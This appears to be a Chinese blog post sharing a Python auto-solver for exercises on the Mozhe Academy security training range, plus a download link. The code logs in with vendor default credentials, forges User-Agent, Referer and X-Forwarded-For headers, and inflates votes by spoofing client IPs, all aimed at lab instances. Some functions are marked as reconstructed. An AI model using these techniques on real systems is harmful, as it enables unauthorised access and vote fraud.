墨者学院靶场自动解题

前言:

墨者学院是一个用于安全学习的网站,其中的在线网络安全攻防技能实训靶场极具特色。

  • 最近做了一些网络安全类的题,但只用 Burp Suite 手工做还不满足,于是我决定写一个自动解题的程序

链接:https://pan.baidu.com/s/1yhE5395g12xvkv4F1FGvyA 
提取码:mvjr 


简单演示:

  • https://www.mozhe.cn/bug/N2dmMnp1b1VYd2EzLzBNR3MvRVlIZz09bW96aGUmozhe
  • 需要注册登录才能做题

  • 进入一个靶场,并启动环境

  • 启动InsectBaby.exe,并依次填入对应的题号、IP、端口

  • 随后提交输出的key值即可

  • 除了几道靠刷请求的题需要30~60秒,其他的都是秒解,所以在座的速度之王们还在等什么?

  • 如果实在太久,有可能是请求阻塞了,建议重新运行一下程序

源码:

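# Listing note: the import lines are not part of this excerpt. The functions
# below expect `re`, `time`, `requests` and `BeautifulSoup` (bs4) to be in
# scope. Every request goes to the lab instance (ip, port) that the user
# started on the training range.
#
# Changes against the published listing:
#   * hard-coded Content-Length values are gone (requests derives the header
#     from the body, so the stale numbers were never sent);
#   * verify=False is gone (all URLs are plain http, so it had no effect);
#   * bare `except:` became `except requests.RequestException`, so Ctrl-C
#     works again while a request is being retried;
#   * every request carries a timeout, and a missing key yields None instead
#     of an IndexError / KeyError.

_DESKTOP_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) "
               "Gecko/20100101 Firefox/117.0")
_ACCEPT_HTML = ("text/html,application/xhtml+xml,application/xml;q=0.9,"
                "image/avif,image/webp,*/*;q=0.8")
_ACCEPT_JSON = "application/json, text/javascript, */*; q=0.01"
_ACCEPT_LANGUAGE = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
_SESSION_COOKIE = "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6"
_TIMEOUT = (30, 50)  # (connect, read) seconds, as used by the original loops


def _post_until_sent(url, headers, data):
    """POST once, retrying every 5 seconds while the request itself fails."""
    while True:
        try:
            requests.post(url=url, headers=headers, data=data, timeout=_TIMEOUT)
            print("\r正在解题,请耐心等待", end='')
            return
        except requests.RequestException:
            # Only transport errors are retried; KeyboardInterrupt propagates.
            print("\r{}".format("●"), end='')
            time.sleep(5)


def _vote_from_forwarded_ips(ip, port, vote_page, result_page, item_id,
                             last_octet_end, closing_ip, key_pattern,
                             user_agent=_DESKTOP_UA, cookie=None):
    """Shared body of the three voting labs (topic_4, topic_5, topic_7).

    The lab applications limit votes per client address but take that address
    from the client-supplied X-Forwarded-For header. Lesson for defenders:
    read the address from the connection (or from a proxy you control that
    overwrites the header) and tie vote limits to authenticated accounts.

    Returns the key found on the result page, or None when the page is not
    reachable or holds no key.
    """
    vote_url = "http://{}:{}/{}".format(ip, port, vote_page)
    result_url = "http://{}:{}/{}".format(ip, port, result_page)
    plain_headers = {"User-Agent": _DESKTOP_UA}
    data = {'id': item_id}

    probe = requests.get(url=result_url, headers=plain_headers, timeout=_TIMEOUT)
    if probe.status_code != 200:
        return None

    headers = {
        "User-Agent": user_agent,
        "Accept": _ACCEPT_JSON,
        "Accept-Language": _ACCEPT_LANGUAGE,
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Origin": "http://{}:{}".format(ip, port),
        "X-FORWARDED-FOR": "",
        "Connection": "close",
        "Referer": result_url,
    }
    if cookie is not None:
        headers["Cookie"] = cookie

    for third_octet in range(1, 3):
        for fourth_octet in range(101, last_octet_end):
            headers['X-FORWARDED-FOR'] = '192.168.{}.{}'.format(third_octet, fourth_octet)
            _post_until_sent(vote_url, headers, data)

    # One vote still missing after the loops (see the callers' comments).
    headers['X-FORWARDED-FOR'] = closing_ip
    requests.post(url=vote_url, headers=headers, data=data, timeout=_TIMEOUT)

    response = requests.get(url=result_url, headers=plain_headers, timeout=_TIMEOUT)
    found = re.findall(key_pattern, response.content.decode("utf-8"))
    return found[0] if found else None


# Default credentials on a firewall product
def topic_1(ip, port):
    """Log in to the lab's firewall UI with the vendor default account.

    Lesson for defenders: default accounts must be changed or disabled at
    deployment, and logins with them should raise an alert.

    Returns the key from the response body, or None.
    """
    url = "http://{}:{}/login.php".format(ip, port)
    headers = {
        "User-Agent": _DESKTOP_UA,
        "Accept": _ACCEPT_HTML,
        "Accept-Language": _ACCEPT_LANGUAGE,
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": "http://{}:{}".format(ip, port),
        "Connection": "close",
        "Referer": "http://{}:{}/login.html".format(ip, port),
        "Cookie": _SESSION_COOKIE + "; verification=89a5b242c7f88765bd270c6cce92328f",
        "Upgrade-Insecure-Requests": "1",
    }
    # Vendor default credentials, collected from product documentation.
    data = {'usr': 'useradmin', 'pwd': 'venus.user', 'validate': 't2fa', 'language': '1'}
    response = requests.post(url=url, headers=headers, data=data, timeout=_TIMEOUT)
    if response.status_code != 200:
        return None
    # NOTE(review): the published page lost characters at the end of this
    # pattern (probably HTML markup) - confirm against the author's file.
    found = re.findall("KEY:\n\n(.*?)\n\n", response.content.decode("utf-8"))
    return found[0] if found else None


# Forged browser information
def topic_2(ip, port):
    """Fetch the page that the lab only serves to the WeChat in-app browser.

    Lesson for defenders: User-Agent is chosen by the client and cannot act
    as an access control.

    Returns the response body, or None.
    """
    host = "http://{}:{}/".format(ip, port)
    url = host + 'mp_weixin_qq_com.php'
    # Forged User-Agent
    headers = {
        'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/2G',
        'Accept': _ACCEPT_HTML,
        'Accept-Language': _ACCEPT_LANGUAGE,
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
        'Referer': host,
        'Upgrade-Insecure-Requests': '1',
    }
    response = requests.get(url=url, headers=headers, timeout=_TIMEOUT)
    if response.status_code == 200:
        return response.content.decode("utf-8")
    return None


# HTTP method exercise
def topic_3(ip, port):
    """Read the long text from the index page and submit it with POST.

    Returns the body of the POST response, or None.
    """
    get_context_url = "http://{}:{}/".format(ip, port)
    get_key_url = "http://{}:{}/".format(ip, port) + "//info.php"
    headers = {
        'User-Agent': _DESKTOP_UA,
        'Accept': _ACCEPT_HTML,
        'Accept-Language': _ACCEPT_LANGUAGE,
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
        # The listing hard-coded the address of one past lab instance here.
        'Referer': get_context_url,
        'Upgrade-Insecure-Requests': '1',
    }
    page = requests.get(url=get_context_url, headers=headers, timeout=_TIMEOUT)
    soup = BeautifulSoup(page.content.decode("utf-8"), 'html.parser')
    title_nodes = soup.select('h4[class="weui_media_title"]')
    if not title_nodes:
        return None
    # NOTE(review): on the published page the replace() literal lost its HTML
    # tags and the line assigning `context` is missing. This text-only
    # extraction is a reconstruction - confirm against the author's file.
    context = title_nodes[0].get_text().replace('静夜思\n', '')
    data = {'content': context}
    headers['Content-Type'] = 'application/x-www-form-urlencoded'
    # The POST body is passed through `data`.
    response = requests.post(url=get_key_url, headers=headers, data=data, timeout=_TIMEOUT)
    if response.status_code == 200:
        return response.content.decode("utf-8")
    return None


# Comment "like" inflation: analysis and tracing
def topic_4(ip, port):
    """Voting lab on like_do.php; see _vote_from_forwarded_ips for the flaw."""
    return _vote_from_forwarded_ips(
        ip, port, "like_do.php", "news_comment.php", item_id='7',
        last_octet_end=211,
        closing_ip='192.168.2.212',  # one more vote to pass 500
        key_pattern="KEY:(.*?)'",
    )


# Common voting flaws: analysis and tracing
def topic_5(ip, port):
    """Voting lab on wx_vote_do.php; it also checks for the WeChat browser."""
    return _vote_from_forwarded_ips(
        ip, port, "wx_vote_do.php", "wx_vote.php", item_id='6',
        last_octet_end=247,
        closing_ip='192.168.2.247',  # one more vote to take first place
        key_pattern="key:(.*?)'",
        user_agent="Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/WIFI",
        cookie=_SESSION_COOKIE,
    )


# Forged referring page
def topic_6(ip, port):
    """Request the search page with a Referer the lab accepts.

    Lesson for defenders: Referer is chosen by the client and must not gate
    access to content.

    Prints the response body and returns True, or returns None.
    """
    url = 'http://{}:{}/x_search_index.php'.format(ip, port)
    headers = {
        'User-Agent': _DESKTOP_UA,
        'Accept': _ACCEPT_HTML,
        'Accept-Language': _ACCEPT_LANGUAGE,
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
        'Referer': 'http://google.com',  # forged Referer
        'Upgrade-Insecure-Requests': '1',
    }
    response = requests.get(url=url, headers=headers, timeout=_TIMEOUT)
    if response.status_code != 200:
        return None
    print(response.content.decode("utf-8"))
    return True


# Design flaw in a voting system
def topic_7(ip, port):
    """Voting lab on vote_do.php; see _vote_from_forwarded_ips for the flaw."""
    return _vote_from_forwarded_ips(
        ip, port, "vote_do.php", "vote.php", item_id='7',
        last_octet_end=232,
        closing_ip='192.168.2.232',  # one more vote to take first place
        key_pattern="key:(.*?)'",
    )


def _login_with_forwarded_ip(ip, port, forwarded_for, user_name, password):
    """Shared body of the two IP-restriction labs (topic_8, topic_9).

    The lab restricts login by client address but reads the address from
    X-Forwarded-For. Lesson for defenders: an address allow-list must use the
    connection's peer address, and it never replaces strong credentials.

    Prints the response body and returns True, or returns None.
    """
    url = "http://{}:{}/login.php".format(ip, port)
    headers = {
        "User-Agent": _DESKTOP_UA,
        "Accept": _ACCEPT_HTML,
        "Accept-Language": _ACCEPT_LANGUAGE,
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": "http://{}:{}".format(ip, port),
        "X-FORWARDED-FOR": forwarded_for,
        "Connection": "close",
        "Referer": "http://{}:{}/".format(ip, port),
        "Cookie": _SESSION_COOKIE,
        "Upgrade-Insecure-Requests": "1",
    }
    data = {'action': 'login', 'user_name': user_name, 'Password': password}
    response = requests.post(url=url, headers=headers, data=data, timeout=_TIMEOUT)
    if response.status_code != 200:
        return None
    print(response.content.decode('utf-8'))
    return True


# Forged IP address (exercise 1)
def topic_8(ip, port):
    """IP-restriction lab 1: loopback address plus a default account."""
    # Vendor default credentials, collected from product documentation.
    return _login_with_forwarded_ip(ip, port, "127.0.0.1", 'admin', 'admin')


# Forged IP address (exercise 2)
def topic_9(ip, port):
    """IP-restriction lab 2: the address the lab accepts plus a weak account."""
    # In the Burp walkthrough this weak password was found by brute force.
    return _login_with_forwarded_ip(ip, port, "59.125.39.5", 'test', 'test')


# Inspecting the data the server returns
def topic_10(ip, port):
    """POST boolean=false and read the key from the response headers.

    Returns the value of the `key` response header, or None when the request
    fails or the header is absent.
    """
    url = "http://{}:{}/".format(ip, port)
    headers = {
        "User-Agent": _DESKTOP_UA,
        "Accept": _ACCEPT_HTML,
        "Accept-Language": _ACCEPT_LANGUAGE,
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": "http://{}:{}".format(ip, port),
        "Connection": "close",
        "Referer": "http://{}:{}/".format(ip, port),
        "Upgrade-Insecure-Requests": "1",
    }
    data = {'boolean': 'false'}
    response = requests.post(url=url, headers=headers, data=data, timeout=_TIMEOUT)
    if response.status_code != 200:
        return None
    return response.headers.get('key')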

